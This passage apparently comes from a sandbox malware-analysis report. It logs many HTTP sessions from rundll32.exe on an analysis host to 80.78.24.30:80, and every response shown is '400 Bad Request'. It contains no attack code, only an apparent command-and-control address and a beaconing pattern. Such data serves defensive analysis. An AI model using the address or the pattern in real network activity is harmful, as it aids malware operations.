                                                                                                                                                                                                                                                Oct 3, 2024 20:44:55.605746031 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:55.606482983 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.76220980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.337161064 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.76221080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.016709089 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.76221280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.720330000 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.76221380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325179100 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325947046 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.327459097 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.76221580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.049864054 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.76221680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.691256046 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.76221880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.401711941 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                23192.168.2.76221980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.091209888 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                24192.168.2.76222280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.748862028 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                25192.168.2.76222380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.418220043 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                26192.168.2.76222580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.201339960 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                27192.168.2.76222680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.821655035 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                28192.168.2.76222880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.482870102 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.76222980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114013910 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                30192.168.2.76223380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:49.300513983 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.76223480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:49.947684050 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.76223680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:51.642235994 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.76223780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:52.288156986 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                34192.168.2.76223980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:55.043018103 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                35192.168.2.76224080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:55.705229044 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                36192.168.2.76224280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:58.406362057 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                37192.168.2.76224380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:59.054761887 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                38192.168.2.76224580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:05.092746019 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                39192.168.2.76224680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:05.758330107 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                40192.168.2.76224980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:12.380300999 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                41192.168.2.76225080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:13.081051111 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                42192.168.2.76225380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:22.662802935 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                43192.168.2.76225480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:23.311691999 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                44192.168.2.76226080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:29.012779951 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                45192.168.2.76226280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:29.700208902 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                46192.168.2.76226680.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:32.434423923 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                47192.168.2.76226880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:33.107724905 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.76228080.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:42.872956991 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                49192.168.2.76228180.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:43.519004107 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                50192.168.2.76228580.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:46.258955002 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                51192.168.2.76228780.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:46.880453110 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                52192.168.2.76229280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:51.850250006 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:51.851268053 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:51.851993084 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                53192.168.2.76229480.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:52.557902098 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                54192.168.2.76229880.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:55.410773039 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                55192.168.2.76229980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:56.116775036 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                56192.168.2.76230280.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:56.834191084 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                57192.168.2.76230380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:46:57.465184927 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                58192.168.2.76230980.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:01.435709953 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
